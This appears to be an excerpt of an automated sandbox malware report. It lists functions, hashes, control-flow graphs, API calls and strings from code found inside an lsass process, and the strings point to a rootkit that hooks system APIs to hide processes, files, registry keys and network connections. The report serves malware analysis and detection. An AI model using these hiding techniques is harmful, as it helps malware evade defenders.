                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 265f4212d38ea3b3e46c55dae75a9839ab9f88983801d7ae21ce8a3aa47b5e51
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: E171EA26310A22C7FB909F6BE95869E23B4F78AF9CF511121D94E47BA9DE34C48CC741
                                                                      Function 000002A2919912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 188830453a345198aa7934d318025cb7fa0c86e460bd2f7c13c811caed25026c
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: C9513636200B95C7EB94CF6AE64835BBBA1F78EF99F644124DA4A07758DF38D04D8B01
                                                                      Function 000002A291991D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 72976cce3cdeaaa03b07112629cfa60ab1e39ff48f18b917d1b00f2fb3e72a4e
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 6631A96470196BE3FB85EBAFEA596D62360F71EF54FE04423940A061A9DF38824DC352
                                                                      Function 000002A2911C6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 316 2a2911c6910-2a2911c6916 317 2a2911c6951-2a2911c695b 316->317 318 2a2911c6918-2a2911c691b 316->318 321 2a2911c6a78-2a2911c6a8d 317->321 319 2a2911c691d-2a2911c6920 318->319 320 2a2911c6945-2a2911c6984 call 2a2911c6fc0 318->320 322 2a2911c6938 __scrt_dllmain_crt_thread_attach 319->322 323 2a2911c6922-2a2911c6925 319->323 336 2a2911c698a-2a2911c699f call 2a2911c6e54 320->336 337 2a2911c6a52 320->337 324 2a2911c6a8f 321->324 325 2a2911c6a9c-2a2911c6ab6 call 2a2911c6e54 321->325 331 2a2911c693d-2a2911c6944 322->331 327 2a2911c6931-2a2911c6936 call 2a2911c6f04 323->327 328 2a2911c6927-2a2911c6930 323->328 329 2a2911c6a91-2a2911c6a9b 324->329 339 2a2911c6aef-2a2911c6b20 call 2a2911c7190 325->339 340 2a2911c6ab8-2a2911c6aed call 2a2911c6f7c call 2a2911c6e1c call 2a2911c7318 call 2a2911c7130 call 2a2911c7154 call 2a2911c6fac 325->340 327->331 348 2a2911c6a6a-2a2911c6a77 call 2a2911c7190 336->348 349 2a2911c69a5-2a2911c69b6 call 2a2911c6ec4 336->349 341 2a2911c6a54-2a2911c6a69 337->341 350 2a2911c6b31-2a2911c6b37 339->350 351 2a2911c6b22-2a2911c6b28 339->351 340->329 348->321 368 2a2911c6a07-2a2911c6a11 call 2a2911c7130 349->368 369 2a2911c69b8-2a2911c69dc call 2a2911c72dc call 2a2911c6e0c call 2a2911c6e38 call 2a2911cac0c 349->369 356 2a2911c6b7e-2a2911c6b94 call 2a2911c268c 350->356 357 2a2911c6b39-2a2911c6b43 350->357 351->350 355 2a2911c6b2a-2a2911c6b2c 351->355 362 2a2911c6c1f-2a2911c6c2c 355->362 377 2a2911c6bcc-2a2911c6bce 356->377 378 2a2911c6b96-2a2911c6b98 356->378 363 2a2911c6b4f-2a2911c6b5d call 2a2911d5780 357->363 364 2a2911c6b45-2a2911c6b4d 357->364 371 2a2911c6b63-2a2911c6b78 call 2a2911c6910 363->371 381 2a2911c6c15-2a2911c6c1d 363->381 364->371 368->337 389 2a2911c6a13-2a2911c6a1f call 2a2911c7180 368->389 369->368 419 2a2911c69de-2a2911c69e5 __scrt_dllmain_after_initialize_c 369->419 371->356 371->381 379 2a2911c6bd0-2a2911c6bd3 377->379 380 2a2911c6bd5-2a2911c6bea call 2a2911c6910 377->380 378->377 386 2a2911c6b9a-2a2911c6bbc call 2a2911c268c call 2a2911c6a78 378->386 379->380 379->381 380->381 398 2a2911c6bec-2a2911c6bf6 380->398 381->362 386->377 413 2a2911c6bbe-2a2911c6bc6 call 2a2911d5780 386->413 406 2a2911c6a21-2a2911c6a2b call 2a2911c7098 389->406 407 2a2911c6a45-2a2911c6a50 389->407 403 2a2911c6c01-2a2911c6c11 call 2a2911d5780 398->403 404 2a2911c6bf8-2a2911c6bff 398->404 403->381 404->381 406->407 418 2a2911c6a2d-2a2911c6a3b 406->418 407->341 413->377 418->407 419->368 420 2a2911c69e7-2a2911c6a04 call 2a2911cabc8 419->420 420->368
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: af5a5ce0cdbfeb3487fb4e6867138305428b7cfe6bc9de5e2f443df4e713f03d
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 1A81AF61700673EBF6D49B6F944939B22A0ABA7F80FB44025D90543796EF78C84DE703
                                                                      Function 000002A29199CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 423 2a29199ce28-2a29199ce4a GetLastError 424 2a29199ce4c-2a29199ce57 FlsGetValue 423->424 425 2a29199ce69-2a29199ce74 FlsSetValue 423->425 426 2a29199ce63 424->426 427 2a29199ce59-2a29199ce61 424->427 428 2a29199ce7b-2a29199ce80 425->428 429 2a29199ce76-2a29199ce79 425->429 426->425 430 2a29199ced5-2a29199cee0 SetLastError 427->430 431 2a29199ce85 call 2a29199d6cc 428->431 429->430 432 2a29199cef5-2a29199cf0b call 2a29199c748 430->432 433 2a29199cee2-2a29199cef4 430->433 434 2a29199ce8a-2a29199ce96 431->434 445 2a29199cf0d-2a29199cf18 FlsGetValue 432->445 446 2a29199cf28-2a29199cf33 FlsSetValue 432->446 436 2a29199cea8-2a29199ceb2 FlsSetValue 434->436 437 2a29199ce98-2a29199ce9f FlsSetValue 434->437 438 2a29199ceb4-2a29199cec4 FlsSetValue 436->438 439 2a29199cec6-2a29199ced0 call 2a29199cb94 call 2a29199d744 436->439 441 2a29199cea1-2a29199cea6 call 2a29199d744 437->441 438->441 439->430 441->429 449 2a29199cf1a-2a29199cf1e 445->449 450 2a29199cf22 445->450 452 2a29199cf35-2a29199cf3a 446->452 453 2a29199cf98-2a29199cf9f call 2a29199c748 446->453 449->453 454 2a29199cf20 449->454 450->446 455 2a29199cf3f call 2a29199d6cc 452->455 458 2a29199cf8f-2a29199cf97 454->458 459 2a29199cf44-2a29199cf50 455->459 460 2a29199cf62-2a29199cf6c FlsSetValue 459->460 461 2a29199cf52-2a29199cf59 FlsSetValue 459->461 462 2a29199cf80-2a29199cf88 call 2a29199cb94 460->462 463 2a29199cf6e-2a29199cf7e FlsSetValue 460->463 464 2a29199cf5b-2a29199cf60 call 2a29199d744 461->464 462->458 469 2a29199cf8a call 2a29199d744 462->469 463->464 464->453 469->458
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000002A29199CE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEBC
                                                                      • SetLastError.KERNEL32 ref: 000002A29199CED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000002A29199ECCC,?,?,?,?,000002A29199BF9F,?,?,?,?,?,000002A291997AB0), ref: 000002A29199CF2C
                                                                        • Part of subcall function 000002A29199D6CC: HeapAlloc.KERNEL32 ref: 000002A29199D721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF54
                                                                        • Part of subcall function 000002A29199D744: HeapFree.KERNEL32 ref: 000002A29199D75A
                                                                        • Part of subcall function 000002A29199D744: GetLastError.KERNEL32 ref: 000002A29199D764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 1aa138d20fc0b827cb1c5f57aa31ac61a2da1025fa63ea259488452dcac820d6
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: B6413D21341666C7FAE8677FDB5D36B61825B4FFB4F340624A936066DEDE28980D8202
                                                                      Function 000002A291992244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: c11dfa66158928d1978f00f7439df635ea03f4532b3de643d8087e6cdc08bdfe
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 18213036714661C3FB508B2AF64835B77A0F78AFA4FA00215DA5902AE8CF7CC18DCB01
                                                                      Function 000002A2911C9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 568 2a2911c9944-2a2911c99ac call 2a2911ca814 571 2a2911c99b2-2a2911c99b5 568->571 572 2a2911c9e13-2a2911c9e1b call 2a2911cbb48 568->572 571->572 574 2a2911c99bb-2a2911c99c1 571->574 576 2a2911c9a90-2a2911c9aa2 574->576 577 2a2911c99c7-2a2911c99cb 574->577 579 2a2911c9aa8-2a2911c9aac 576->579 580 2a2911c9d63-2a2911c9d67 576->580 577->576 578 2a2911c99d1-2a2911c99dc 577->578 578->576 582 2a2911c99e2-2a2911c99e7 578->582 579->580 581 2a2911c9ab2-2a2911c9abd 579->581 583 2a2911c9da0-2a2911c9daa call 2a2911c8a34 580->583 584 2a2911c9d69-2a2911c9d70 580->584 581->580 585 2a2911c9ac3-2a2911c9aca 581->585 582->576 586 2a2911c99ed-2a2911c99f7 call 2a2911c8a34 582->586 583->572 596 2a2911c9dac-2a2911c9dcb call 2a2911c6d40 583->596 584->572 587 2a2911c9d76-2a2911c9d9b call 2a2911c9e1c 584->587 589 2a2911c9ad0-2a2911c9b07 call 2a2911c8e10 585->589 590 2a2911c9c94-2a2911c9ca0 585->590 586->596 601 2a2911c99fd-2a2911c9a28 call 2a2911c8a34 * 2 call 2a2911c9124 586->601 587->583 589->590 605 2a2911c9b0d-2a2911c9b15 589->605 590->583 597 2a2911c9ca6-2a2911c9caa 590->597 598 2a2911c9cba-2a2911c9cc2 597->598 599 2a2911c9cac-2a2911c9cb8 call 2a2911c90e4 597->599 598->583 604 2a2911c9cc8-2a2911c9cd5 call 2a2911c8cb4 598->604 599->598 612 2a2911c9cdb-2a2911c9ce3 599->612 636 2a2911c9a2a-2a2911c9a2e 601->636 637 2a2911c9a48-2a2911c9a52 call 2a2911c8a34 601->637 604->583 604->612 610 2a2911c9b19-2a2911c9b4b 605->610 614 2a2911c9b51-2a2911c9b5c 610->614 615 2a2911c9c87-2a2911c9c8e 610->615 617 2a2911c9df6-2a2911c9e12 call 2a2911c8a34 * 2 call 2a2911cbaa8 612->617 618 2a2911c9ce9-2a2911c9ced 612->618 614->615 619 2a2911c9b62-2a2911c9b7b 614->619 615->590 615->610 617->572 621 2a2911c9cef-2a2911c9cfe call 2a2911c90e4 618->621 622 2a2911c9d00 618->622 623 2a2911c9b81-2a2911c9bc6 call 2a2911c90f8 * 2 619->623 624 2a2911c9c74-2a2911c9c79 619->624 632 2a2911c9d03-2a2911c9d0d call 2a2911ca8ac 621->632 622->632 651 2a2911c9bc8-2a2911c9bee call 2a2911c90f8 call 2a2911ca038 623->651 652 2a2911c9c04-2a2911c9c0a 623->652 629 2a2911c9c84 624->629 629->615 632->583 644 2a2911c9d13-2a2911c9d61 call 2a2911c8d44 call 2a2911c8f50 632->644 636->637 642 2a2911c9a30-2a2911c9a3b 636->642 637->576 650 2a2911c9a54-2a2911c9a74 call 2a2911c8a34 * 2 call 2a2911ca8ac 637->650 642->637 648 2a2911c9a3d-2a2911c9a42 642->648 644->583 648->572 648->637 674 2a2911c9a8b 650->674 675 2a2911c9a76-2a2911c9a80 call 2a2911ca99c 650->675 668 2a2911c9bf0-2a2911c9c02 651->668 669 2a2911c9c15-2a2911c9c72 call 2a2911c9870 651->669 656 2a2911c9c7b 652->656 657 2a2911c9c0c-2a2911c9c10 652->657 662 2a2911c9c80 656->662 657->623 662->629 668->651 668->652 669->662 674->576 678 2a2911c9df0-2a2911c9df5 call 2a2911cbaa8 675->678 679 2a2911c9a86-2a2911c9def call 2a2911c86ac call 2a2911ca3f4 call 2a2911c88a0 675->679 678->617 679->678
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 1ab0267fc7bca66e60e4a560c75babf12bbadfccf9fd62817e12a732324c591d
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 36E18B727007A6DBEBA08B6AD48939E77A0F747F98F200106EA8957B55CF34C09DD702
                                                                      Function 000002A29199A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 689 2a29199a544-2a29199a5ac call 2a29199b414 692 2a29199aa13-2a29199aa1b call 2a29199c748 689->692 693 2a29199a5b2-2a29199a5b5 689->693 693->692 694 2a29199a5bb-2a29199a5c1 693->694 696 2a29199a690-2a29199a6a2 694->696 697 2a29199a5c7-2a29199a5cb 694->697 699 2a29199a963-2a29199a967 696->699 700 2a29199a6a8-2a29199a6ac 696->700 697->696 701 2a29199a5d1-2a29199a5dc 697->701 702 2a29199a9a0-2a29199a9aa call 2a291999634 699->702 703 2a29199a969-2a29199a970 699->703 700->699 704 2a29199a6b2-2a29199a6bd 700->704 701->696 705 2a29199a5e2-2a29199a5e7 701->705 702->692 715 2a29199a9ac-2a29199a9cb call 2a291997940 702->715 703->692 706 2a29199a976-2a29199a99b call 2a29199aa1c 703->706 704->699 708 2a29199a6c3-2a29199a6ca 704->708 705->696 709 2a29199a5ed-2a29199a5f7 call 2a291999634 705->709 706->702 712 2a29199a6d0-2a29199a707 call 2a291999a10 708->712 713 2a29199a894-2a29199a8a0 708->713 709->715 719 2a29199a5fd-2a29199a628 call 2a291999634 * 2 call 2a291999d24 709->719 712->713 724 2a29199a70d-2a29199a715 712->724 713->702 716 2a29199a8a6-2a29199a8aa 713->716 721 2a29199a8ba-2a29199a8c2 716->721 722 2a29199a8ac-2a29199a8b8 call 2a291999ce4 716->722 757 2a29199a62a-2a29199a62e 719->757 758 2a29199a648-2a29199a652 call 2a291999634 719->758 721->702 728 2a29199a8c8-2a29199a8d5 call 2a2919998b4 721->728 722->721 737 2a29199a8db-2a29199a8e3 722->737 730 2a29199a719-2a29199a74b 724->730 728->702 728->737 734 2a29199a751-2a29199a75c 730->734 735 2a29199a887-2a29199a88e 730->735 734->735 738 2a29199a762-2a29199a77b 734->738 735->713 735->730 739 2a29199a9f6-2a29199aa12 call 2a291999634 * 2 call 2a29199c6a8 737->739 740 2a29199a8e9-2a29199a8ed 737->740 742 2a29199a781-2a29199a7c6 call 2a291999cf8 * 2 738->742 743 2a29199a874-2a29199a879 738->743 739->692 744 2a29199a8ef-2a29199a8fe call 2a291999ce4 740->744 745 2a29199a900 740->745 770 2a29199a804-2a29199a80a 742->770 771 2a29199a7c8-2a29199a7ee call 2a291999cf8 call 2a29199ac38 742->771 749 2a29199a884 743->749 753 2a29199a903-2a29199a90d call 2a29199b4ac 744->753 745->753 749->735 753->702 768 2a29199a913-2a29199a961 call 2a291999944 call 2a291999b50 753->768 757->758 762 2a29199a630-2a29199a63b 757->762 758->696 774 2a29199a654-2a29199a674 call 2a291999634 * 2 call 2a29199b4ac 758->774 762->758 767 2a29199a63d-2a29199a642 762->767 767->692 767->758 768->702 775 2a29199a87b 770->775 776 2a29199a80c-2a29199a810 770->776 790 2a29199a7f0-2a29199a802 771->790 791 2a29199a815-2a29199a872 call 2a29199a470 771->791 795 2a29199a68b 774->795 796 2a29199a676-2a29199a680 call 2a29199b59c 774->796 780 2a29199a880 775->780 776->742 780->749 790->770 790->771 791->780 795->696 799 2a29199a9f0-2a29199a9f5 call 2a29199c6a8 796->799 800 2a29199a686-2a29199a9ef call 2a2919992ac call 2a29199aff4 call 2a2919994a0 796->800 799->739 800->799
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 6c9b64aea459f5939bf3dd068a7343ba8d08770816b9b7ac5fa50ecb001ac872
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 29E18D76700761CBFBA08B2AD64839E77A0F75AB98F200115EE8957B99CF34C489C742
                                                                      Function 000002A29199F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 695a17d8ccce6949de6e16a908dae3d83cd48f590e0b0682d832d3bf9de70fad
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 1A41A422311A22D3FA95CB1FEA0C7576795B74FFE4F6941299D1A87788EE38C44D8302
                                                                      Function 000002A29199104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 1a33caf0f8baa57e1695812279deb1ee3f10c99bf09f8d6bf124dabded2f67c7
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: CA416D72214B95D7E7A0CF26E54839B77A1F38AF98F548129DA8A07758DF38C48DCB01
                                                                      Function 000002A29199D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 2eda56979e5e09bf1eaaea1a055d2580c86bac67b708ba4e2ae130481bc55e5c
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: C5113061704666C7FAE8573FE79937B61816B4FFE4F384224942A066DEDE28844D8202
                                                                      Function 000002A291997510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: f80ffc22932428fa4e3cbc88985e60adca33b6c3b2487c09d5e61210d3ffa293
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: EA819E21700263C7FAD8AB6FE64939B6690A78FF80F7444259A054779EDF38C84D8B53
                                                                      Function 000002A291999DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 5b077497e61e3eaf08f735d87a2babf30c03001d38dd30611cea9d9a8ed7bffa
